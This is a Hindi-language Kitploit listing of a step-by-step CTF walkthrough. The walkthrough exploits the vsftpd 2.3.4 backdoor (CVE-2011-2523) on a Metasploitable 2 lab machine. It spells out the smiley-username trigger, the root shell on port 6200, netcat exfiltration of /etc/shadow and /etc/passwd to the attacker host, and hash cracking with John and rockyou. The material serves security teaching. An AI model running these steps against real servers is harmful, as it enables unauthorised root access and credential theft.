Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CTF---CVE-2011-2523 — vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण करते हुए चरण-दर-चरण CTF वॉकथ्रू, Metasploitable 2 से /etc/shadow और /etc/passwd को कैप्चर और क्रैक करने के लिए। | Kitploit
उपकरण/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
पासवर्ड क्रैकिंगटोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण करते हुए चरण-दर-चरण CTF वॉकथ्रू, Metasploitable 2 से /etc/shadow और /etc/passwd को कैप्चर और क्रैक करने के लिए।

रिपॉजिटरी देखें
173 साल पहलेअभी तक समीक्षित नहीं

परिदृश्य फ़्लैग कैप्चर - CVE-2011-2523

असुरक्षित Metasploitable 2 सर्वर से डिक्रिप्टेड /etc/shadow और /etc/passwd फ़ाइल कैप्चर करें।

सेटअप वातावरण

चरण 1: वर्चुअल मशीन डाउनलोड और अनज़िप करें

इस CTF के लिए, हम दो वर्चुअल मशीनों के साथ VMware Workstation Pro चलाते हैं। हम आक्रमणकारी मशीन के रूप में Kali Linux का उपयोग करते हैं और असुरक्षित मशीन के रूप में Metasploitable 2 का।

  • VMware Workstation डाउनलोड और इंस्टॉल करें: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Kali Linux वर्चुअल मशीन डाउनलोड और एक्सट्रैक्ट करें: https://www.kali.org/get-kali/
  • Metasploitable 2 वर्चुअल मशीन डाउनलोड और एक्सट्रैक्ट करें: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

चरण 2: निकाली गई फ़ाइल से VMware में Kali Linux और Metasploitable 2 वर्चुअल मशीनें खोलें

  • VMware Workstation में ओपन ए वर्चुअल मशीन विकल्प चुनें और अनज़िप की गई Kali Linux फ़ाइल चुनें
  • स्लाइड बार पर राइट क्लिक करें और ओपन विकल्प चुनें, फिर अनज़िप की गई Metasploitable 2 फ़ाइल चुनें
  • दोनों वर्चुअल मशीनों पर प्ले वर्चुअल मशीन बटन दबाएं
  • जब I moved It या I copied It विकल्प चुनने का संकेत मिले, तो I copied It विकल्प चुनें

चरण 3: लॉगिन करें

  • यूज़रनेम और पासवर्ड के रूप में kali का उपयोग करके Kali Linux में लॉगिन करें
  • यूज़रनेम और पासवर्ड के रूप में msfadmin का उपयोग करके Metasploitable में लॉगिन करें

चरण 4: Metasploitable वर्चुअल मशीन का IP पता रिकॉर्ड करें

  • ip addr show चलाएं और inet सेक्शन का IP पता रिकॉर्ड करें

समाधान

Massachusetts Institute of Technology Research and Engineering CVE-2011-2523 को एक सामान्य कमज़ोरी और एक्सपोज़र के रूप में विस्तृत करता है जहाँ vsftpd 2.3.4 20110630 और 20110703 के बीच डाउनलोड किया गया, जिसमें एक बैकडोर है जो पोर्ट 6200/tcp पर एक शेल खोलता है।

चरण 1: FTP सेवा का उपयोग करके Metasploitable मशीन पर खुले पोर्ट खोजें

  • nmap <असुरक्षित-मशीन-आईपी-पता>
  • nmap स्कैन को ftp सेवा का उपयोग करके पोर्ट 21 पर एक खुला पोर्ट दिखाना चाहिए

चरण 2: खुले पोर्ट में NetCat के माध्यम से प्रवेश का प्रयास करें

  • nc <असुरक्षित-मशीन-आईपी-पता> 21
  • यूज़रनेम अंत में :) के साथ कोई भी स्ट्रिंग है, user <string>:) दर्ज करें
  • जब पासवर्ड के लिए संकेत दिया जाए तो कोई भी स्ट्रिंग pass <string> दर्ज करें
  • फिर ^C [CTRL + C] का उपयोग करके कनेक्शन से बाहर निकलें, पोर्ट 6200 पर Metasploitable के लिए रूट पर एक शेल खोल दिया गया है।

चरण 3: असुरक्षित मशीन के पोर्ट 6200 पर शेल से कनेक्ट करें

  • nc -v <असुरक्षित-मशीन-आईपी-पता> 6200
  • वर्तमान कनेक्शन का ip पता दिखाएं ip addr show
  • whoami का उपयोग करके दिखाएं कि रूट एक्सेस प्रदान किया गया था

चरण 4: /etc/shadow और /etc/passwd फ़ाइल को दूसरी फ़ाइल में कॉपी करें

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

चरण 5: कॉपी की गई फ़ाइलों को NetCat का उपयोग करके Kali Linux मशीन पर भेजें

  • आक्रमणकारी मशीन पर, कमांड ip addr show का उपयोग करके inet के अंतर्गत आईपी पता देखें
  • आक्रमणकारी मशीन पर nc -l -p 1234 > shadow.txt का उपयोग करके फ़ाइलों को सुनें
  • Metasploitable पर रूट शेल में nc -w 3 <गंतव्य-आईपी> 1234 < shadow.txt
  • passwd फ़ाइल के लिए दोहराएं

चरण 5: शैडो फ़ाइल को John टूल प्रारूप में प्रारूपित करें

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • cat unshadowed-input का उपयोग करके फ़ाइल देखें, इसमें उपयोगकर्ता नाम और पासवर्ड संग्रहीत होना चाहिए

चरण 6: John कमांड और वर्डलिस्ट का उपयोग करके शैडो फ़ाइल को डिक्रिप्ट करें

  • हैश को क्रैक करने के लिए वर्डलिस्ट rockyou.txt का उपयोग करें
  • sudo gzip -d /usr/share/wordlists/rockyou.txt.gz का उपयोग करके Kali Linux पर वर्डलिस्ट फ़ाइल को अनज़िप करें
  • जब पासवर्ड के लिए संकेत दिया जाए, तो Kali Linux का डिफ़ॉल्ट व्यवस्थापक पासवर्ड kali का उपयोग करें
  • john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt का उपयोग करके पासवर्ड अनहैश करें
  • क्रैक किए गए पासवर्ड देखें john –show unshadowed-input
टूल डाउनलोड करें